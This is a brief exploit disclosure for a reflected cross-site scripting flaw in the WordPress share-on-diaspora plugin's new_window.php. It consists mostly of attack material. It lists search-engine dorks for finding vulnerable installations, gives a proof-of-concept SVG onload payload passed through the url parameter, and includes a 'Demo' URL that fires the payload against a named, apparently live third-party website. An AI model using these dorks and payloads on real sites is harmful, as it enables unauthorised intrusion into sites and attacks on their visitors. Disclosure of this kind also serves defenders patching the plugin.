WordPress Share-On-Diaspora Cross Site Scripting

`[+] Title: WordPress share-on-diaspora Plugin Cross Site Scripting (XSS)  
[+] Date: 2017/08/17  
[+] Author: APA Golestan - GuCert  
[+] Vendor Homepage: www.WordPress.org  
[+] Tested on: Windows 10 & Kali Linux  
[+] Vulnerable File: /new_window.php  
[+] Dorks : inurl:/wp-content/plugins/share-on-diaspora/new_window.php?url=  
  
intext:"by Share on Diaspora plugin for WordPress."  
  
### POC:  
  
[+] Xss Alert Code: a><svg onload=alert(/xss/)>  
  
[+] http://site/wp-content/plugins/share-on-diaspora/new_window.php?url=a><svg  
onload=alert(/xss/)>  
  
### Demo:  
  
[+] Photo: http://gucert.ir/files/2017/08/apa-1.jpg  
  
[+]  
http://openlifechallenge.cc/wp-content/plugins/share-on-diaspora/new_window.php?url=%E2%80%9D%3E%3Csvg%20onload=alert(/xss/)%3E  
  
### Credits:  
[+] Gucert.ir  
`